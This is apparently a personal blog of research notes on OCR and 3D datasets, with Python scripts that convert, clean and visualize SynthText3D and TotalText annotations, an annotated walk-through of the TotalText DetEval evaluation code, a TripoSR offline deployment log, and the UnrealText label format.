    lines = data.split("\n")  # split the text into lines
    result = []
    for line in lines:
        if len(line) > 1:
            values = line.split(",")  # split each line by commas
            result.extend([float(s) for s in values])

    x_list = [result[::2][i:i+4] for i in range(0, len(result[::2]), 4)]
    y_list = [result[1::2][i:i+4] for i in range(0, len(result[1::2]), 4)]

    string = ""

    for i in range(len(x_list)):
        x = x_list[i]
        y = y_list[i]
        points = np.array([x, y], np.int32).T

        # emit one TotalText-style annotation line per quadrilateral
        string += 'x: [['
        string += ' '.join(map(str, x))
        string += ']], y: [['
        string += ' '.join(map(str, y))
        string += "]], ornt: [u'h"
        string += "'], transcriptions: [u'"
        string += "#"
        string += "']\n"
    with open(os.path.join(save_dir, "poly_gt_img" + str(index) + ".txt"), 'w', encoding='UTF-8') as file:
        file.write(string)

import os
from tqdm import tqdm

file_dir = r"E:\dataset\Synth3D-10K\Images\\"

# prefix every image file name with "img" to match the TotalText naming convention
for file in tqdm(os.listdir(file_dir)):
    os.rename(os.path.join(file_dir, file), os.path.join(file_dir, "img" + file))
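For reference, one line of the generated poly_gt_img*.txt then looks like this (the coordinate values here are made up for illustration):

x: [[85 198 200 87]], y: [[443 444 480 479]], ornt: [u'h'], transcriptions: [u'#']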

Saving the visualization results (TotalText format)

import numpy as np
import cv2
import os
import matplotlib.pyplot as plt
from shapely.geometry import Polygon
from tqdm import tqdm

image_dir = r'D:\mindOCR_dataset\SynthText3D\Images\Train\\'
label_dir = r'D:\mindOCR_dataset\SynthText3D\Txts\Train\\'
save_dir = r'D:\mindOCR_dataset\SynthText3D\Images\Train3\\'

for index in tqdm(range(1, 10001)):
    image_path = os.path.join(image_dir, 'img' + str(index) + '.jpg')
    label_path = os.path.join(label_dir, 'poly_gt_img' + str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape
    try:
        label_file = open(label_path, 'r')
    except FileNotFoundError:  # skip indices without a label file
        continue
    annotations = label_file.readlines()
    label_file.close()

    for annotation in annotations:
        # parse the x list, y list and orientation back out of the TotalText line
        x = [int(num) for num in annotation[annotation.find("x: [[") + 5: annotation.find("]], y: [[")].split()]
        y = [int(num) for num in annotation[annotation.find("y: [[") + 5: annotation.find("]], ornt: [")].split()]
        ornt = annotation[annotation.find("ornt: [u'") + 9: annotation.find("'], transcriptions: [")]

        points = np.array([x, y], np.int32).T

        cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
        for p in points:
            cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.imwrite(os.path.join(save_dir, str(index) + '.jpg'), image)

Cleaning the data

​	As expected, the dataset contains far too much bad data; mindOCR simply chokes on it, which makes me wonder whether the paper itself has some issues. Time to clean it up.

​	Remove annotations whose quadrilaterals are too small, do not form a valid quadrilateral, fall outside the image bounds, or intersect another box (exactly the checks in the script below); with those gone it can barely run.

​	Some of the data is broken in even more complicated ways; oh well, as long as it runs.

import numpy as np
import cv2
import os
import matplotlib.pyplot as plt
from shapely.geometry import Polygon
from tqdm import tqdm


def check_intersection(rectangle, rectangle_list):
    # rectangle_list already holds shapely Polygons;
    # fixed: test against the polygon passed in, not a global variable
    for other_rectangle in rectangle_list:
        if rectangle != other_rectangle:
            if rectangle.intersects(other_rectangle):
                return True
    return False


image_dir = r'F:\dataset\Synth3D-10K\img\\'
label_dir = r'F:\dataset\Synth3D-10K\label\\'
save_dir = r'D:\mindOCR_dataset\SynthText3D\Txts\Train\\'
error_list = []

for index in range(1, 10000 + 1):
    image_path = os.path.join(image_dir, str(index) + '.jpg')
    label_path = os.path.join(label_dir, str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape

    with open(label_path, "r") as file:
        data = file.read()

    lines = data.split("\n")  # split the text into lines
    result = []
    for line in lines:
        if len(line) > 1:
            values = line.split(",")  # split each line by commas
            result.extend([float(s) for s in values])

    x_list = [result[::2][i:i+4] for i in range(0, len(result[::2]), 4)]
    y_list = [result[1::2][i:i+4] for i in range(0, len(result[1::2]), 4)]
    points_list = []
    is_error = False

    for i in range(len(x_list)):
        x = x_list[i]
        y = y_list[i]
        points_list.append(Polygon(np.array([x, y], np.int32).T))

    if not is_error:
        string = ""
        for i in range(len(x_list)):
            x = list(map(int, x_list[i]))
            y = list(map(int, y_list[i]))

            polygon = Polygon(np.array([x, y], np.int32).T)

            if polygon.area < 200:
                is_error = True
                error_list.append(index)
                print(index, "quadrilateral too small", polygon.area)
                continue

            if not (polygon.is_valid and len(polygon.exterior.coords) == 5):
                is_error = True
                error_list.append(index)
                print(index, "not a valid quadrilateral")
                continue

            if min(y) < 0 or min(x) < 0 or max(x) > width or max(y) > height:
                is_error = True
                error_list.append(index)
                print(index, "out of bounds")
                continue

            if check_intersection(polygon, points_list):
                is_error = True
                error_list.append(index)
                print(index, "intersects", polygon.area)
                continue

            string += 'x: [['
            string += ' '.join(map(str, x))
            string += ']], y: [['
            string += ' '.join(map(str, y))
            string += "]], ornt: [u'h"
            string += "'], transcriptions: [u'"
            string += "A"
            string += "']\n"
        if len(string) > 0:
            print("writing", index)
            with open(os.path.join(save_dir, "poly_gt_img" + str(index) + ".txt"), 'w', encoding='UTF-8') as file:
                file.write(string)
Paper: Synthetic Data for Text Localisation in Natural Images

Notes

Code

This project seems a bit old, it looks like it was written in Python 2.x... I set up a 3.9 environment anyway, and then spent forever patching the code orz

conda create -n SynthText python=3.9

Then install a whole pile of packages:

pygame==2.0.0, opencv (cv2), PIL (Image), numpy, matplotlib, h5py, scipy

Download the required files from Synthetic Data for Text Localisation in Natural Images - Academic Torrents.


Wait, wait! I had missed an important sentence in README.md.

Paper: TotalText

    Deteval

• Definition
from os import listdir
from scipy import io
import numpy as np
# mask counting version
# from polygon_wrapper import iod
# from polygon_wrapper import area_of_intersection
# from polygon_wrapper import area

# polygon based version
from polygon_fast import iod
from polygon_fast import area_of_intersection
from polygon_fast import area
from tqdm import tqdm

try:  # python2
    range = xrange
except NameError:  # python3
    range = range

"""
Input format: y0,x0, ..... yn,xn. Each detection is separated by the end of line token ('\n')'
"""

input_dir = '../Examples/Prediction/'  # detection directory goes here
gt_dir = '../Examples/Groundtruth/'  # gt directory goes here
fid_path = '../Examples/'  # output text file directory goes here

allInputs = listdir(input_dir)
• input_reading_mod()
def input_reading_mod(input_dir, input):
    """This helper reads input from txt files"""
    with open('%s/%s' % (input_dir, input), 'r', encoding='latin-1') as input_fid:
        pred = input_fid.readlines()
    det = [x.strip('\n') for x in pred]
    return det

This is the definition of a function named input_reading_mod, which reads input from text files.

Its parameters are input_dir and input, the input directory and the name of the file to read.
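
For instance, reading one prediction file (the file name here is hypothetical, assuming the directory layout above):

det = input_reading_mod(input_dir, 'img1.txt')
print(det[0])  # one detection per element, e.g. 'y0,x0,y1,x1,...'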


    • gt_reading_mod()
def gt_reading_mod(gt_dir, gt_id):
    """This helper reads groundtruths from mat files"""
    gt_id = gt_id.split('.')[0]
    gt = io.loadmat('%s/poly_gt_%s.mat' % (gt_dir, gt_id))
    gt = gt['polygt']
    return gt

This is the definition of a function named gt_reading_mod, which reads annotation data from .mat files.

Its parameters are gt_dir and gt_id, the annotation directory and the name of the file to read.
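
Usage mirrors input_reading_mod; the same (hypothetical) prediction file name resolves to its matching .mat annotation, since the function strips the extension itself:

gt = gt_reading_mod(gt_dir, 'img1.txt')  # loads ../Examples/Groundtruth/poly_gt_img1.mat
print(gt.shape)  # one row per ground-truth polygon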


    • detection_filtering()
def detection_filtering(detections, groundtruths, threshold=0.5):
    for gt_id, gt in enumerate(groundtruths):
        if (gt[5] == '#') and (gt[1].shape[1] > 1):
            gt_x = list(map(int, np.squeeze(gt[1])))
            gt_y = list(map(int, np.squeeze(gt[3])))
            for det_id, detection in enumerate(detections):
                detection = detection.split(',')
                detection = list(map(int, detection))
                det_y = detection[0::2]
                det_x = detection[1::2]
                det_gt_iou = iod(det_x, det_y, gt_x, gt_y)
                if det_gt_iou > threshold:
                    detections[det_id] = []

    detections[:] = [item for item in detections if item != []]
    return detections

This is the definition of a function named detection_filtering, which discards detections that overlap too much with don't-care ('#') ground-truth regions.

Its parameters are detections and groundtruths, the detection results and the annotation data, plus an optional threshold for the overlap ratio, defaulting to 0.5.


    • sigma_calculation()
def sigma_calculation(det_x, det_y, gt_x, gt_y):
    """
    sigma = inter_area / gt_area
    """
    # print(area_of_intersection(det_x, det_y, gt_x, gt_y))
    return np.round((area_of_intersection(det_x, det_y, gt_x, gt_y) / area(gt_x, gt_y)), 2)

This is the definition of a function named sigma_calculation, which measures how much of a ground-truth region is covered by a detection.

Its parameters are det_x, det_y, gt_x, and gt_y, the vertex coordinates of the detection and of the ground truth.

The function computes the overlap (sigma) with the formula:

sigma = inter_area / gt_area

where inter_area is the area of the intersection between the detection and the ground truth, and gt_area is the area of the ground-truth region.

Internally it calls the two helpers area_of_intersection and area to obtain those areas, divides the intersection area by the ground-truth area, and rounds the result to two decimal places with np.round.

Finally, the function returns the computed overlap.
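
A quick numeric sanity check of sigma (and the tau defined next) using shapely as an illustrative stand-in for polygon_fast; the two boxes here are made up:

from shapely.geometry import Polygon

gt = Polygon([(0, 0), (10, 0), (10, 4), (0, 4)])   # ground-truth box, area 40
det = Polygon([(5, 0), (15, 0), (15, 4), (5, 4)])  # detection box, area 40
inter = gt.intersection(det).area                  # 20.0

sigma = inter / gt.area   # 0.5 -> covers half of the ground truth
tau = inter / det.area    # 0.5 -> half of the detection is useful
print(sigma, tau)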


    • tau_calculation()
def tau_calculation(det_x, det_y, gt_x, gt_y):
    """
    tau = inter_area / det_area
    """
    return np.round((area_of_intersection(det_x, det_y, gt_x, gt_y) / area(det_x, det_y)), 2)

This is the definition of a function named tau_calculation, the counterpart of sigma_calculation seen from the detection's side.

Its parameters are det_x, det_y, gt_x, and gt_y, the vertex coordinates of the detection and of the ground truth.

The function computes the overlap (tau) with the formula:

tau = inter_area / det_area

where inter_area is the area of the intersection between the detection and the ground truth, and det_area is the area of the detection region.

Internally it again uses area_of_intersection and area, divides the intersection area by the detection area, and rounds to two decimal places with np.round.

Finally, the function returns the computed overlap.


• Variable definitions
global_tp = 0
global_fp = 0
global_fn = 0
global_sigma = []
global_tau = []
tr = 0.7
tp = 0.6
fsc_k = 0.8
k = 2

This code defines the global variables global_tp, global_fp, global_fn, global_sigma, and global_tau, initializing the counters to 0 and the tables to empty lists.

Here global_tp is the global count of true positives, global_fp the false positives, global_fn the false negatives, global_sigma the global list of sigma tables, and global_tau the global list of tau tables. The remaining constants are the DetEval parameters: tr is the sigma (recall-side) threshold, tp the tau (precision-side) threshold, fsc_k the penalty weight applied to split and merge matches, and k the minimum number of overlapping boxes before a one-to-many or many-to-one match is considered.


• Evaluation
for input_id in tqdm(allInputs):
    if (input_id != '.DS_Store') and (input_id != 'Pascal_result.txt') and (
            input_id != 'Pascal_result_curved.txt') and (input_id != 'Pascal_result_non_curved.txt') and (input_id != 'Deteval_result.txt') and (input_id != 'Deteval_result_curved.txt') \
            and (input_id != 'Deteval_result_non_curved.txt'):
        # print(input_id)
        detections = input_reading_mod(input_dir, input_id)
        groundtruths = gt_reading_mod(gt_dir, input_id)
        detections = detection_filtering(detections, groundtruths)  # filters detections overlapping with DC area
        dc_id = np.where(groundtruths[:, 5] == '#')
        groundtruths = np.delete(groundtruths, (dc_id), (0))

        local_sigma_table = np.zeros((groundtruths.shape[0], len(detections)))
        local_tau_table = np.zeros((groundtruths.shape[0], len(detections)))

        for gt_id, gt in enumerate(groundtruths):
            if len(detections) > 0:
                for det_id, detection in enumerate(detections):
                    detection = detection.split(',')
                    detection = list(map(int, detection))
                    det_y = detection[0::2]
                    det_x = detection[1::2]
                    gt_x = list(map(int, np.squeeze(gt[1])))
                    gt_y = list(map(int, np.squeeze(gt[3])))

                    local_sigma_table[gt_id, det_id] = sigma_calculation(det_x, det_y, gt_x, gt_y)
                    local_tau_table[gt_id, det_id] = tau_calculation(det_x, det_y, gt_x, gt_y)

        global_sigma.append(local_sigma_table)
        global_tau.append(local_tau_table)

global_accumulative_recall = 0
global_accumulative_precision = 0
total_num_gt = 0
total_num_det = 0

This code iterates with a for loop over every input_id in the allInputs list.

Inside the loop, a chain of conditions first skips special entries such as .DS_Store and Pascal_result.txt. It then calls input_reading_mod to read the detections from input_dir, and gt_reading_mod to read the annotation data from gt_dir.
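
For reference, each file in input_dir is plain text with one detected polygon per line, coordinates interleaved as y,x pairs per the docstring above (these numbers are made up):

10,20,12,120,40,118,38,22
55,30,60,150,85,148,80,28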


    • one_to_one()
def one_to_one(local_sigma_table, local_tau_table, local_accumulative_recall,
               local_accumulative_precision, global_accumulative_recall, global_accumulative_precision,
               gt_flag, det_flag):
    for gt_id in range(num_gt):
        gt_matching_qualified_sigma_candidates = np.where(local_sigma_table[gt_id, :] > tr)
        gt_matching_num_qualified_sigma_candidates = gt_matching_qualified_sigma_candidates[0].shape[0]
        gt_matching_qualified_tau_candidates = np.where(local_tau_table[gt_id, :] > tp)
        gt_matching_num_qualified_tau_candidates = gt_matching_qualified_tau_candidates[0].shape[0]

        det_matching_qualified_sigma_candidates = np.where(local_sigma_table[:, gt_matching_qualified_sigma_candidates[0]] > tr)
        det_matching_num_qualified_sigma_candidates = det_matching_qualified_sigma_candidates[0].shape[0]
        det_matching_qualified_tau_candidates = np.where(local_tau_table[:, gt_matching_qualified_tau_candidates[0]] > tp)
        det_matching_num_qualified_tau_candidates = det_matching_qualified_tau_candidates[0].shape[0]

        if (gt_matching_num_qualified_sigma_candidates == 1) and (gt_matching_num_qualified_tau_candidates == 1) and \
                (det_matching_num_qualified_sigma_candidates == 1) and (det_matching_num_qualified_tau_candidates == 1):
            global_accumulative_recall = global_accumulative_recall + 1.0
            global_accumulative_precision = global_accumulative_precision + 1.0
            local_accumulative_recall = local_accumulative_recall + 1.0
            local_accumulative_precision = local_accumulative_precision + 1.0

            gt_flag[0, gt_id] = 1
            matched_det_id = np.where(local_sigma_table[gt_id, :] > tr)
            det_flag[0, matched_det_id] = 1
    return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag

This code defines a function named one_to_one, which takes local_sigma_table, local_tau_table, local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, and det_flag.

Its for loop runs gt_id from 0 to num_gt, where num_gt is the number of ground-truth regions: a ground truth and a detection count as a one-to-one match when each qualifies the other exactly once under both thresholds.
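
A toy example of the tables this matching runs on (values invented; rows are ground truths, columns are detections):

import numpy as np

tr, tp = 0.7, 0.6
local_sigma_table = np.array([[0.9, 0.0],
                              [0.1, 0.8]])
local_tau_table = np.array([[0.8, 0.0],
                            [0.0, 0.7]])

for gt_id in range(2):
    sigma_hits = np.where(local_sigma_table[gt_id, :] > tr)[0]
    tau_hits = np.where(local_tau_table[gt_id, :] > tp)[0]
    print(gt_id, sigma_hits, tau_hits)  # each GT pairs with exactly one detection -> one-to-one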


    • one_to_many()
def one_to_many(local_sigma_table, local_tau_table, local_accumulative_recall,
                local_accumulative_precision, global_accumulative_recall, global_accumulative_precision,
                gt_flag, det_flag):
    for gt_id in range(num_gt):
        # skip the following if the groundtruth was matched
        if gt_flag[0, gt_id] > 0:
            continue

        non_zero_in_sigma = np.where(local_sigma_table[gt_id, :] > 0)
        num_non_zero_in_sigma = non_zero_in_sigma[0].shape[0]

        if num_non_zero_in_sigma >= k:
            #### search for all detections that overlap with this groundtruth
            qualified_tau_candidates = np.where((local_tau_table[gt_id, :] >= tp) & (det_flag[0, :] == 0))
            num_qualified_tau_candidates = qualified_tau_candidates[0].shape[0]

            if num_qualified_tau_candidates == 1:
                if ((local_tau_table[gt_id, qualified_tau_candidates] >= tp) and (local_sigma_table[gt_id, qualified_tau_candidates] >= tr)):
                    # became a one-to-one case
                    global_accumulative_recall = global_accumulative_recall + 1.0
                    global_accumulative_precision = global_accumulative_precision + 1.0
                    local_accumulative_recall = local_accumulative_recall + 1.0
                    local_accumulative_precision = local_accumulative_precision + 1.0

                    gt_flag[0, gt_id] = 1
                    det_flag[0, qualified_tau_candidates] = 1
            elif (np.sum(local_sigma_table[gt_id, qualified_tau_candidates]) >= tr):
                gt_flag[0, gt_id] = 1
                det_flag[0, qualified_tau_candidates] = 1

                global_accumulative_recall = global_accumulative_recall + fsc_k
                global_accumulative_precision = global_accumulative_precision + num_qualified_tau_candidates * fsc_k

                local_accumulative_recall = local_accumulative_recall + fsc_k
                local_accumulative_precision = local_accumulative_precision + num_qualified_tau_candidates * fsc_k

    return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag

This code defines a function named one_to_many, which is similar to the earlier one_to_one and takes the same parameters.

Its for loop runs gt_id from 0 to num_gt, where num_gt is the number of ground-truth regions: a single unmatched ground truth covered by several detections is accepted, but with the fsc_k penalty instead of full credit.
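
The fsc_k = 0.8 penalty is easiest to see with numbers (a hypothetical split case):

fsc_k = 0.8

# one ground truth covered by 3 detections whose sigma values sum past tr:
num_qualified_tau_candidates = 3
recall_gain = fsc_k                                    # 0.8 instead of 1.0
precision_gain = num_qualified_tau_candidates * fsc_k  # 3 * 0.8 = 2.4 over 3 detections
print(recall_gain, precision_gain)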


    • many_to_one()
def many_to_one(local_sigma_table, local_tau_table, local_accumulative_recall,
                local_accumulative_precision, global_accumulative_recall, global_accumulative_precision,
                gt_flag, det_flag):
    for det_id in range(num_det):
        # skip the following if the detection was matched
        if det_flag[0, det_id] > 0:
            continue

        non_zero_in_tau = np.where(local_tau_table[:, det_id] > 0)
        num_non_zero_in_tau = non_zero_in_tau[0].shape[0]

        if num_non_zero_in_tau >= k:
            #### search for all groundtruths that overlap with this detection
            qualified_sigma_candidates = np.where((local_sigma_table[:, det_id] >= tp) & (gt_flag[0, :] == 0))
            num_qualified_sigma_candidates = qualified_sigma_candidates[0].shape[0]

            if num_qualified_sigma_candidates == 1:
                if ((local_tau_table[qualified_sigma_candidates, det_id] >= tp) and (local_sigma_table[qualified_sigma_candidates, det_id] >= tr)):
                    # became a one-to-one case
                    global_accumulative_recall = global_accumulative_recall + 1.0
                    global_accumulative_precision = global_accumulative_precision + 1.0
                    local_accumulative_recall = local_accumulative_recall + 1.0
                    local_accumulative_precision = local_accumulative_precision + 1.0

                    gt_flag[0, qualified_sigma_candidates] = 1
                    det_flag[0, det_id] = 1
            elif (np.sum(local_tau_table[qualified_sigma_candidates, det_id]) >= tp):
                det_flag[0, det_id] = 1
                gt_flag[0, qualified_sigma_candidates] = 1

                global_accumulative_recall = global_accumulative_recall + num_qualified_sigma_candidates * fsc_k
                global_accumulative_precision = global_accumulative_precision + fsc_k

                local_accumulative_recall = local_accumulative_recall + num_qualified_sigma_candidates * fsc_k
                local_accumulative_precision = local_accumulative_precision + fsc_k
    return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag

This code defines a function named many_to_one, the mirror image of one_to_many, with the same parameters.

Its for loop runs det_id from 0 to num_det, where num_det is the number of detections: a single unmatched detection that covers several ground truths is accepted with the same fsc_k penalty.


• Saving results
for idx in range(len(global_sigma)):
    print(allInputs[idx])
    local_sigma_table = global_sigma[idx]
    local_tau_table = global_tau[idx]

    num_gt = local_sigma_table.shape[0]
    num_det = local_sigma_table.shape[1]

    total_num_gt = total_num_gt + num_gt
    total_num_det = total_num_det + num_det

    local_accumulative_recall = 0
    local_accumulative_precision = 0
    gt_flag = np.zeros((1, num_gt))
    det_flag = np.zeros((1, num_det))

    ####### first check for one-to-one case ##########
    local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
        gt_flag, det_flag = one_to_one(local_sigma_table, local_tau_table,
                                       local_accumulative_recall, local_accumulative_precision,
                                       global_accumulative_recall, global_accumulative_precision,
                                       gt_flag, det_flag)

    ####### then check for one-to-many case ##########
    local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
        gt_flag, det_flag = one_to_many(local_sigma_table, local_tau_table,
                                        local_accumulative_recall, local_accumulative_precision,
                                        global_accumulative_recall, global_accumulative_precision,
                                        gt_flag, det_flag)

    ####### then check for many-to-one case ##########
    local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
        gt_flag, det_flag = many_to_one(local_sigma_table, local_tau_table,
                                        local_accumulative_recall, local_accumulative_precision,
                                        global_accumulative_recall, global_accumulative_precision,
                                        gt_flag, det_flag)

    fid = open(fid_path, 'a+')
    try:
        local_precision = local_accumulative_precision / num_det
    except ZeroDivisionError:
        local_precision = 0

    try:
        local_recall = local_accumulative_recall / num_gt
    except ZeroDivisionError:
        local_recall = 0

    temp = ('%s______/Precision:_%s_______/Recall:_%s\n' % (allInputs[idx], str(local_precision), str(local_recall)))
    fid.write(temp)
    fid.close()

try:
    recall = global_accumulative_recall / total_num_gt
except ZeroDivisionError:
    recall = 0

try:
    precision = global_accumulative_precision / total_num_det
except ZeroDivisionError:
    precision = 0

try:
    f_score = 2 * precision * recall / (precision + recall)
except ZeroDivisionError:
    f_score = 0

fid = open(fid_path, 'a')
temp = ('Precision:_%s_______/Recall:_%s\n' % (str(precision), str(recall)))
fid.write(temp)
fid.close()
print(temp)

This final code is a loop over every element of the global_sigma list.

On each iteration it first prints allInputs[idx], then assigns global_sigma[idx] to local_sigma_table and global_tau[idx] to local_tau_table, runs the three matching passes in order, and appends the per-file precision and recall to the result file before the global numbers are computed at the end.
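
The final numbers combine in the usual way; for instance, with made-up totals:

global_accumulative_recall = 80.0    # hypothetical
total_num_gt = 100
global_accumulative_precision = 72.0
total_num_det = 90

recall = global_accumulative_recall / total_num_gt         # 0.8
precision = global_accumulative_precision / total_num_det  # 0.8
f_score = 2 * precision * recall / (precision + recall)    # 0.8
print(precision, recall, f_score)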


Visualizing the dataset

​	Based on the dataset's source images and its txt annotation format, plus a round of ChatGPT and some fiddling, I wrote a visualization script:

import cv2
import os
import matplotlib.pyplot as plt
import numpy as np

index = 396

image_dir = r'E:\dataset\TotalText\Images\Test\\'
label_dir = r'E:\dataset\TotalText\GroundTruth\Text\Test\\'

image_path = os.path.join(image_dir, 'img' + str(index) + '.jpg')
label_path = os.path.join(label_dir, 'poly_gt_img' + str(index) + '.txt')

image_origin = cv2.imread(image_path)
image = image_origin.copy()
height, width, _ = image.shape
label_file = open(label_path, 'r')
annotations = label_file.readlines()
label_file.close()

for annotation in annotations:
    x = [int(num) for num in annotation[annotation.find("x: [[") + 5: annotation.find("]], y: [[")].split()]
    y = [int(num) for num in annotation[annotation.find("y: [[") + 5: annotation.find("]], ornt: [")].split()]
    ornt = annotation[annotation.find("ornt: [u'") + 9: annotation.find("'], transcriptions: [")]
    transcriptions = annotation[annotation.find("transcriptions: [u'") + 19: -3]

    points = np.array([x, y], np.int32).T

    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
        cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, ornt, (x[0], y[0] + int(min(height, width) / 50)), cv2.FONT_HERSHEY_SIMPLEX,
                min(height, width) / 1000, (255, 0, 255), int(min(height, width) / 500))
    cv2.putText(image, transcriptions, (x[0], y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
                min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
axes = axes.flatten()

axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
axes[0].axis('off')
axes[0].set_title('Origin')

axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
axes[1].axis('off')
axes[1].set_title('Annotation')

plt.tight_layout()
plt.show()

(image: visualization result)

Paper: TripoSR - Fast 3D Object Reconstruction from a Single Image

Let's run it

​	You can try it online at TripoSR - a Hugging Face Space by stabilityai, or attempt an offline deployment.

​	Get the code repository from VAST-AI-Research/TripoSR (github.com).

​	Set up a virtual environment:

conda create -n TripoSR python=3.9

​	After installing PyTorch, install the dependencies inside the repo:

pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

​	Take a look at the argparse options in run.py.


​	Since downloading Hugging Face models from behind the firewall tends to fail, I switched to loading the model offline. Modify run.py as follows:

parser.add_argument(
    "--pretrained-model-name-or-path",
    default="models/",  # "stabilityai/TripoSR",
    type=str,
    help="Path to the pretrained model. Could be either a huggingface model id is or a local path. Default: 'stabilityai/TripoSR'",
)

​	Download config.yaml and model.ckpt from stabilityai/TripoSR at main (huggingface.co) into models/:
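
The repo then looks like this (layout as I set it up; only these two files are needed):

TripoSR/
+---models
|       config.yaml
|       model.ckpt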

(image: placing the model files)

​	Prepare an input image. I choose you, Taobao mascot!

(image: the Alibaba mascot)

​	Run it!

python run.py examples/XXX.png --output-dir output/

​	Emmm, it still downloaded something called 'https://github.com/danielgatis/rembg/releases/download/v0.0.0/u2net.onnx'; luckily that one isn't blocked.

2024-03-18 11:02:00,713 - INFO - Initializing model ...
Downloading config.json: 100%|█████████████████████████████████████████████████████████| 454/454 [00:00<00:00, 149kB/s]
C:\Users\19048\.conda\envs\TripoSR\lib\site-packages\huggingface_hub\file_download.py:137: UserWarning: `huggingface_hub` cache-system uses symlinks by default to efficiently store duplicated files but your machine does not support them in C:\Users\19048\.cache\huggingface\hub. Caching files will still work but in a degraded version that might require more space on your disk. This warning can be disabled by setting the `HF_HUB_DISABLE_SYMLINKS_WARNING` environment variable. For more details, see https://huggingface.co/docs/huggingface_hub/how-to-cache#limitations.
To support symlinks on Windows, you either need to activate Developer Mode or to run Python as an administrator. In order to see activate developer mode, see this article: https://docs.microsoft.com/en-us/windows/apps/get-started/enable-your-device-for-development
warnings.warn(message)
2024-03-18 11:02:07,536 - INFO - Initializing model finished in 6819.83ms.
2024-03-18 11:02:07,539 - INFO - Processing images ...
Downloading data from 'https://github.com/danielgatis/rembg/releases/download/v0.0.0/u2net.onnx' to file 'C:\Users\19048\.u2net\u2net.onnx'.
100%|########################################| 176M/176M [00:00<00:00, 117GB/s]
2024-03-18 11:02:30,617 - INFO - Processing images finished in 23078.31ms.
2024-03-18 11:02:30,617 - INFO - Running image 1/1 ...
2024-03-18 11:02:30,618 - INFO - Running model ...
2024-03-18 11:02:35,306 - INFO - Running model finished in 4686.22ms.
2024-03-18 11:02:35,306 - INFO - Exporting mesh ...
torchmcubes was not compiled with CUDA support, use CPU version instead.
2024-03-18 11:02:37,869 - INFO - Exporting mesh finished in 2563.17ms.

​	The program automatically removes the background for you:

(image: automatic background removal)

​	But the matting isn't great, so the generated model picks up some background information. Let's cut the subject out by hand and try again.

Paper: UnrealText - Synthesizing Realistic Scene Text Images from the Unreal World

Dataset

The Multilingual version covers 10 languages: Arabic, English, French, Chinese, German, Korean, Japanese, Italian, Bengali, and Hindi.

The two datasets total roughly 150 GB, so they were split into about 130 archives, organized as follows:

./
+---sub_0
|   +---imgs
|   |       0.jpg
|   |       1.jpg
|   |       ...
|   |
|   +---labels
|           0.json
|           1.json
|           ...
|
+---sub_1
+---sub_2
+---sub_3
...
+---sub_100
...

Labels are stored in the following format:

{
    "imgfile": str path to the corresponding image file, e.g. "imgs/0.jpg",
    "bbox": List[
        word_i (8 floats): [x0, y0, x1, y1, x2, y2, x3, y3]
        (from upper left corner, clockwise),
    ],
    "cbox": List[
        char_i (8 floats): [x0, y0, x1, y1, x2, y2, x3, y3]
        (from upper left corner, clockwise),
    ],
    "text": List[str]
}
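
A minimal way to read one of these labels (a sketch; the path is just an example):

import json

with open('sub_0/labels/0.json', 'r', encoding='utf-8') as f:
    label = json.load(f)

print(label['imgfile'])               # e.g. imgs/0.jpg
for box, text in zip(label['bbox'], label['text']):
    x = box[0::2]                     # 4 x-coordinates, clockwise from upper left
    y = box[1::2]                     # 4 y-coordinates
    print(text, list(zip(x, y)))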

For example:

(example image: imgs/54.jpg)

{
"imgfile": "imgs/54.jpg",
"bbox": [[478, 188, 526, 234, 526, 248, 477, 203], [479, 223, 527, 265, 526, 281, 477, 239], [474, 251, 527, 295, 527, 307, 473, 264],

......

, [590, 532, 781, 492, 799, 547, 598, 579], [809, 489, 844, 482, 860, 524, 823, 530], [214, 652, 274, 644, 267, 674, 207, 679]],
"cbox": [[478, 188, 526, 234, 526, 248, 477, 203], [479, 223, 527, 265, 526, 281, 477, 239], [474, 251, 527, 295, 527, 307, 473, 264],

......

, [236, 437, 291, 457, 286, 475, 229, 456], [222, 476, 274, 492, 268, 514, 214, 500], [457, 560, 572, 536, 578, 573, 459, 593], [590, 532, 781, 492, 799, 547, 598, 579], [809, 489, 844, 482, 860, 524, 823, 530], [214, 652, 274, 644, 267, 674, 207, 679]],
"text": ["\"process", "Caloger", "billowin", "746", "Sasc", "(Twitter", "AlHarth", "corporation", "Val", "MARKET", "habits", "He", "\u201cT", "(tr", "hu", "180", "Dr", "Ch", "sic", "Ab", "Fo", "in", "Temes,", "Ar", "F3D2Ms)", "Viaduct\"", "\u2018An", "dracae", "\u00d8land", "\"Dev", "throwback", "locus", "GB)", "Central\u2013St", "USHL/NH", "touc", "Sele", "flat", "tsao", "Novn", "Eckh", "French", "Melapia", "E", "floor"],
"is_difficult": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
}


    {
    "imgfile": "imgs/15.jpg",
    "bbox": [[772, 225, 807, 221, 806, 233, 771, 237], [811, 217, 888, 207, 886, 228, 810, 236],

    ......

